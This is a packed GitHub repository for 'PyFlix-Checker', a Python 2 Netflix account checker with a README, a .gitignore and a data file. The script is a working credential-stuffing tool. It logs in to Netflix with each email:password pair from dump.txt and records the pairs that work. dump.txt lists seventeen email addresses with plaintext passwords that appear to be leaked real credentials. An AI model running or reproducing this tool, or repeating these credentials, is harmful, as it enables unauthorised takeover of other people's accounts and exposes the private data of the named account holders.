├── .gitignore ├── PyFlix-Checker.py ├── README.md └── dump.txt /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | # C extensions 6 | *.so 7 | 8 | # Distribution / packaging 9 | .Python 10 | env/ 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | *.egg-info/ 23 | .installed.cfg 24 | *.egg 25 | 26 | # PyInstaller 27 | # Usually these files are written by a python script from a template 28 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 29 | *.manifest 30 | *.spec 31 | 32 | # Installer logs 33 | pip-log.txt 34 | pip-delete-this-directory.txt 35 | 36 | # Unit test / coverage reports 37 | htmlcov/ 38 | .tox/ 39 | .coverage 40 | .coverage.* 41 | .cache 42 | nosetests.xml 43 | coverage.xml 44 | *,cover 45 | 46 | # Translations 47 | *.mo 48 | *.pot 49 | 50 | # Django stuff: 51 | *.log 52 | 53 | # Sphinx documentation 54 | docs/_build/ 55 | 56 | # PyBuilder 57 | target/ 58 | -------------------------------------------------------------------------------- /PyFlix-Checker.py: -------------------------------------------------------------------------------- 1 | import mechanize 2 | import time 3 | 4 | 5 | print '[+]---Netflix Account Checker v0.1---[+]' 6 | print '--------------By Ramonem----------------' 7 | time.sleep(2) 8 | contex=0 9 | contno=0 10 | 11 | accPass=[] 12 | outfile = open('good.txt', 'w') 13 | 14 | 15 | br = mechanize.Browser() 16 | br.set_handle_equiv(True) 17 | br.set_handle_redirect(True) 18 | br.set_handle_referer(True) 19 | br.set_handle_robots(False) 20 | br.addheaders = [('User-agent', 'Firefox')] 21 | try: 22 | with open("dump.txt", "r") as filestream: 23 | for line in filestream: 24 | br.open('https://www.netflix.com/Login?locale=es-CL') 25 | currentline = line.split(':') 26 | br.select_form(nr=0) 27 | br.form['email'] = currentline[0] 28 | br.form['password'] = currentline[1] 29 | print 'Logueando.. mail: '+br.form['email'] 30 | response = br.submit() 31 | if response.geturl()=='http://www.netflix.com/browse': 32 | print 'Cuenta activa' 33 | contex = contex + 1 34 | br.open('http://www.netflix.com/SignOut?lnkctr=mL') 35 | accPass.append(currentline[0]+':'+currentline[1]) 36 | time.sleep(2) 37 | else: 38 | print 'Muerta..' 39 | contno = contno + 1 40 | time.sleep(2) 41 | 42 | print 'Escribiendo cuentas activas al txt..' 43 | for all in accPass: 44 | print all 45 | outfile.write(str(all)+'\n') 46 | except: 47 | print 'Algo malo ocurrio.. Guardando progreso..' 48 | for all in accPass: 49 | outfile.write(str(all)+'\n') 50 | 51 | print 'cuentas activas: ' + str(contex) 52 | print 'cuentas muertas: ' + str(contno) 53 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PyFlix-Checker 2 | Netflix account checker 3 | A simple Python Script for check a list of accounts in txt file.
4 | The script check one by one email and passwords.
5 | The lives accounts will be written in other txt.
6 | Mechanize need to run 7 | -------------------------------------------------------------------------------- /dump.txt: -------------------------------------------------------------------------------- 1 | filipedicastro@gmail.com:021281 2 | feluzan@gmail.com:017055 3 | evsac2@gmail.com:danilo01 4 | ehtorto@gmail.com:14ou78 5 | fausky@gmail.com:ric4rd0! 6 | fayeaowens@gmail.com:jumper 7 | gamblingirl2@msn.com:gretzky99 8 | gino4283@yahoo.com:scooters 9 | fernandajs@gmail.com:204312 10 | eightballwoody@yahoo.com:acts238 11 | gregshannon@hotmail.com:sherry 12 | drw@cll.com:dotsie23 13 | garcial60@comcast.net:tigger60 14 | fapetrucci@gmail.com:ua3brk4c 15 | gibikoski@gmail.com:f301085g 16 | gknicley@rochester.rr.com:haley1 17 | grap_adf@hotmail.com:903641 18 | --------------------------------------------------------------------------------